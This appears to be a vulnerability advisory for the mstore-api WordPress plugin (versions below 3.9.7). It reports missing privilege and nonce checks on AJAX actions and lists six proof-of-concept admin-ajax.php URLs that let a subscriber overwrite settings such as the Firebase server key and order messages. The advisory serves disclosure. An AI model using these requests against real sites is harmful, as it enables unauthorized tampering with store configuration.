The plugin does not secure most of its AJAX actions by implementing privilege checks, nonce checks, or a combination of both.
Make sure the site also has WooCommerce installed and activated, then, while logged-in as a subscriber, visit the following URLs: - http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_limit_product&limit;=99 - http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_firebase_server_key&serverKey;=hacked - http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_new_order_title&title;=1337 - http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_new_order_message&message;=hacked+message - http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_status_order_title&title;=1338 - http://TARGET-SERVER/wp-admin/admin-ajax.php?action=mstore_update_status_order_message&message;=hacked+message Then, while logged-in as an administrator, visit /wp-admin/admin.php?page=mstore-plugin, and notice how the attacks have changed all the values.
CPE | Name | Operator | Version |
---|---|---|---|
mstore-api | lt | 3.9.7 |